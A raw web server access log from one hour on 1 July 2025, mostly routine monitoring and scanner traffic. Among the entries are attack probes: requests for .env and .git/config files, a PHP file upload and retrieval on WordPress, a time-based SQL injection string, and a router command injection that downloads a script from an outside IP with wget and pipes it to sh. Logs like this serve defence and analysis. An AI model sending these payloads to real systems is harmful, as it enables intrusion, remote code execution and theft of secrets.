212.91.247.32 - - [01/Jul/2025:21:04:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.135.193.162 - - [01/Jul/2025:21:05:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.251.153.117 - - [01/Jul/2025:21:05:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:21:05:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [01/Jul/2025:21:06:06 +0200] "GET /userRpmNatDebugRpm26525557/start_art.html HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:21:06:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.251.153.117 - - [01/Jul/2025:21:07:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:21:07:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:08:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:09:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:10:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.251.153.117 - - [01/Jul/2025:21:11:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:21:11:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.135.193.162 - - [01/Jul/2025:21:12:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
45.135.193.162 - - [01/Jul/2025:21:12:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:21:12:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
137.184.235.255 - - [01/Jul/2025:21:13:22 +0200] "GET /api/client_hello HTTP/1.1" 404 321 "-" "cpp-httplib/0.12.1"
212.91.247.32 - - [01/Jul/2025:21:13:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:14:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.90.154.37 - - [01/Jul/2025:21:15:15 +0200] "GET /api/client_hello HTTP/1.1" 404 321 "-" "cpp-httplib/0.12.1"
45.135.193.162 - - [01/Jul/2025:21:15:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:21:15:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
157.230.25.87 - - [01/Jul/2025:21:16:54 +0200] "GET /api/client_hello HTTP/1.1" 404 321 "-" "cpp-httplib/0.12.1"
212.91.247.32 - - [01/Jul/2025:21:16:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
139.59.165.54 - - [01/Jul/2025:21:17:25 +0200] "GET /api/client_hello HTTP/1.1" 404 321 "-" "cpp-httplib/0.12.1"
212.91.247.32 - - [01/Jul/2025:21:17:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.183 - - [01/Jul/2025:21:18:21 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:21:18:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.183 - - [01/Jul/2025:21:19:52 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:21:19:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:20:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.153.140.151 - - [01/Jul/2025:21:21:04 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.151 - - [01/Jul/2025:21:21:05 +0200] "GET /.env HTTP/1.1" 404 309 "-" "SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1"
78.153.140.151 - - [01/Jul/2025:21:21:05 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2 like Mac OS X) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.1.2 Mobile/14C92 Safari/602.1"
78.153.140.151 - - [01/Jul/2025:21:21:05 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Android 7.1.1; Tablet; rv:57.0) Gecko/57.0 Firefox/57.0"
78.153.140.151 - - [01/Jul/2025:21:21:05 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Linux; U; Android 4.3; en-us; SPH-L720 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30evme-launcher"
78.153.140.151 - - [01/Jul/2025:21:21:06 +0200] "GET /.env.example HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; Android 5.1.1; SM-J200G Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.91 Mobile Safari/537.36"
78.153.140.151 - - [01/Jul/2025:21:21:06 +0200] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 334 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"
78.153.140.151 - - [01/Jul/2025:21:21:06 +0200] "GET /?phpinfo=-1 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36"
157.230.248.242 - - [01/Jul/2025:21:21:13 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
157.230.248.242 - - [01/Jul/2025:21:21:13 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
176.96.131.92 - - [01/Jul/2025:21:21:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.251.153.117 - - [01/Jul/2025:21:21:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:21:21:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:21:22:05 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:21:22:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
18.97.5.11 - - [01/Jul/2025:21:22:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/58.0.3087.66 Safari/537.32"
152.32.235.85 - - [01/Jul/2025:21:23:54 +0200] "GET /version HTTP/1.1" 404 312 "-" "-"
152.32.235.85 - - [01/Jul/2025:21:23:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
152.32.235.85 - - [01/Jul/2025:21:23:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
152.32.235.85 - - [01/Jul/2025:21:23:55 +0200] "GET /v1 HTTP/1.1" 404 307 "-" "-"
152.32.235.85 - - [01/Jul/2025:21:23:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:21:23:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.92.132.13 - - [01/Jul/2025:21:24:52 +0200] "GET /api/client_hello HTTP/1.1" 404 321 "-" "cpp-httplib/0.12.1"
212.91.247.32 - - [01/Jul/2025:21:24:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:25:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [01/Jul/2025:21:26:48 +0200] "GET /pfblockerng/www/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Macintosh: Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
77.90.153.48 - - [01/Jul/2025:21:26:49 +0200] "GET /index.asp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
77.90.153.48 - - [01/Jul/2025:21:26:49 +0200] "POST /network_test.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
77.90.153.48 - - [01/Jul/2025:21:26:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0"
77.90.153.48 - - [01/Jul/2025:21:26:51 +0200] "POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1" 404 328 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:21:26:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:21:26:57 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
77.90.153.48 - - [01/Jul/2025:21:27:01 +0200] "POST /network_test.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
206.189.115.96 - - [01/Jul/2025:21:27:07 +0200] "GET /api/client_hello HTTP/1.1" 404 321 "-" "cpp-httplib/0.12.1"
212.91.247.32 - - [01/Jul/2025:21:27:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [01/Jul/2025:21:28:20 +0200] "GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
77.90.153.48 - - [01/Jul/2025:21:28:21 +0200] "POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=2z5DL7ZmsqW0EDXlqul7MAvIqUN.pHp HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
77.90.153.48 - - [01/Jul/2025:21:28:24 +0200] "GET /wp-admin/users.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0"
77.90.153.48 - - [01/Jul/2025:21:28:25 +0200] "GET /wp-content/uploads/cfom_files/2z5dl7zmsqw0edxlqul7maviqun.php HTTP/1.1" 404 366 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/114.0 Safari/537.36"
147.182.227.31 - - [01/Jul/2025:21:28:33 +0200] "GET /api/client_hello HTTP/1.1" 404 321 "-" "cpp-httplib/0.12.1"
77.90.153.48 - - [01/Jul/2025:21:28:35 +0200] "GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15"
212.91.247.32 - - [01/Jul/2025:21:28:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [01/Jul/2025:21:28:59 +0200] "GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1" 404 362 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
77.90.153.48 - - [01/Jul/2025:21:29:00 +0200] "GET /api/v2/cmdb/system/admin HTTP/1.1" 404 329 "-" "Node.js"
77.90.153.48 - - [01/Jul/2025:21:29:11 +0200] "GET /api/v2/cmdb/system/admin HTTP/1.1" 404 329 "-" "Node.js"
77.90.153.48 - - [01/Jul/2025:21:29:26 +0200] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 405 358 "-" "Report Runner"
77.90.153.48 - - [01/Jul/2025:21:29:38 +0200] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 405 358 "-" "Report Runner"
212.91.247.32 - - [01/Jul/2025:21:29:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.157.153.236 - - [01/Jul/2025:21:30:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [01/Jul/2025:21:30:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:31:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.45 - - [01/Jul/2025:21:32:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
164.92.132.13 - - [01/Jul/2025:21:32:33 +0200] "GET /api/client_hello HTTP/1.1" 404 321 "-" "cpp-httplib/0.12.1"
147.185.132.126 - - [01/Jul/2025:21:32:50 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.247.32 - - [01/Jul/2025:21:32:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:33:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:34:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:35:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:21:36:19 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
80.251.153.117 - - [01/Jul/2025:21:36:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.251.153.117 - - [01/Jul/2025:21:36:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:21:36:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.251.153.117 - - [01/Jul/2025:21:37:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.43.33.210 - - [01/Jul/2025:21:37:39 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
167.94.145.105 - - [01/Jul/2025:21:37:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.105 - - [01/Jul/2025:21:37:42 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.105 - - [01/Jul/2025:21:37:43 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
45.43.33.210 - - [01/Jul/2025:21:37:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
167.94.145.105 - - [01/Jul/2025:21:37:46 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.145.105 - - [01/Jul/2025:21:37:46 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.145.105 - - [01/Jul/2025:21:37:50 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.94.145.105 - - [01/Jul/2025:21:37:50 +0200] "GET /wiki HTTP/1.1" 404 309 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.247.32 - - [01/Jul/2025:21:37:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:38:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:39:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.131.155.254 - - [01/Jul/2025:21:40:14 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:21:40:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:21:40:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [01/Jul/2025:21:40:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:21:40:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:41:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.47 - - [01/Jul/2025:21:42:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [01/Jul/2025:21:42:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.212 - - [01/Jul/2025:21:43:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.247.32 - - [01/Jul/2025:21:43:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.153.96.79 - - [01/Jul/2025:21:44:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [01/Jul/2025:21:44:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:21:45:38 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.58.198 - - [01/Jul/2025:21:45:46 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:21:45:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:46:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:47:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.249.70.35 - - [01/Jul/2025:21:48:10 +0200] "GET /robots.txt HTTP/1.1" 404 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.35 - - [01/Jul/2025:21:48:11 +0200] "GET /web71/ HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
79.124.58.198 - - [01/Jul/2025:21:48:11 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
87.121.84.34 - - [01/Jul/2025:21:48:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.234.135/x/tplink+-O-|sh) HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:21:48:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.34 - - [01/Jul/2025:21:48:56 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.234.135/x/tplink+-O-|sh) HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:21:49:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.82.78.254 - - [01/Jul/2025:21:50:20 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0"
79.124.58.198 - - [01/Jul/2025:21:50:29 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:21:50:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:21:51:54 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:21:51:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:52:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:21:53:01 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:21:53:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:54:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [01/Jul/2025:21:55:10 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [01/Jul/2025:21:55:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:56:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:57:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:58:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [01/Jul/2025:21:59:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
